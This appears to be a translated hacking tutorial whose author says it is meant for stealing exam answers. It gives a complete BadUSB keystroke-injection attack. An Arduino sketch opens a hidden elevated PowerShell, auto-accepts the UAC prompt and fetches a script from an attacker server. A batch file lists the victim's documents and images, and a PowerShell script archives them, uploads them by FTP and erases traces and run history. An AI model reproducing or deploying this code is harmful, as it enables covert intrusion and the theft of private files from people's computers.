HID Advanced Attack posture: How to Use PowerShell scripts to steal files
0 × 01 Introduction
After the mid-term exam, I had to steal the answer again. I found that the method of remote download and run exe is not very good and it is easy to report viruses. So I plan to use the ps script here.
0 × 02 about HID
HID is short for Human Interface Device. Its name indicates that a HID Device is a Device that interacts directly with people, such as a keyboard, mouse, or game lever. However, human and machine interfaces are not required for HID devices, as long as all devices that comply with the HID category specifications are HID devices. Generally, attacks against HID are mainly concentrated on the keyboard and mouse, because as long as the user's keyboard is controlled, the user's computer is basically controlled. Attackers can hide the attack in a normal mouse or keyboard. When a user inserts a mouse or keyboard containing an attack vector into a computer, the malicious code is loaded and executed.
0 × 03 preparation tools
An Internet host (you can use a computer to connect to a network cable for broadband dialing)
A hid attack tool (roast goose or Badusb)
FTPserver (build an FTP server to receive stolen files)
PHPstudy (set up an http server to store ps scripts, etc)
7z.exe/7z. dll (stored on the http server and then compressed and uploaded to reduce the upload speed as much as possible)
Code Section 0 × 04 (the following code may be offensive and should not be used for illegal purposes)
1. [get. bat] (obtain the desired file storage location and save it to c: \ temp. bat) [this code is stored in the http root directory of the server]
dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.batdir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.batdir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.batdir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat
2. [get. ps1] (clear running records and download 7z from the server. dll/7z.exe/get. bat to drive c to the corresponding location and process c: \ temp. bat is 7z compressed to c: \ Ram.7z. Upload c: \ Ram.7z to the FTP server root directory and delete all downloaded files !!! A total of four IP addresses need to be changed !!!) [This code is stored in the http root directory of the server. Remember to set the FTP server password to admin.]
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');
C:\Users\Public\get.bat;$array="";foreach($u in(get-content c:\temp.bat)){[array]$array +='c:\7z a -t7z c:\Ram.7z "'+$u+'"'};$array | Out-File -Encoding default c:\temp.bat;c:\temp.bat;
$fileinf=New-Object System.Io.FileInfo("C:\Ram.7z");
$ftp = [System.Net.FtpWebRequest] [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/"+$fileinf.name)
$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
$ftp.Credentials = new-object System.Net.NetworkCredential("admin","admin")
$ftp.UseBinary = $true
$ftp.UsePassive = $true
$content = [System.IO.File]::ReadAllBytes($fileInf.fullname)
$ftp.ContentLength = $content.Length
$rs = $ftp.GetRequestStream()
$rs.Write($content, 0, $content.Length)
$rs.Close()
$rs.Dispose()
Remove-Item c:\temp.bat
Remove-Item c:\Ram.*
Remove-Item c:\7z.*
Remove-Item c:\Users\Public\get.*
3. [get. ino] (download get. ps1 as an administrator to the local c: \ users \ public directory !!! You need to change the IP address of 1 !!! After the UAC flash, remember to unplug it.) [directly refresh the IP address after modification]
Void setup () {// Initialization
Keyboard. begin (); // start Keyboard Communication
Delay (5000); // latency
Keyboard. press (KEY_LEFT_GUI); // win key
delay(500);
Keyboard. press ('R'); // r key
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("POWERSHELL -NOP");
delay(800);
Keyboard.println();
delay(800);
Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard. end (); // ends the Keyboard Communication
}
Void loop () // loop
{
Keyboard.release(KEY_LEFT_ALT);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(KEY_LEFT_ALT);
delay(50);
}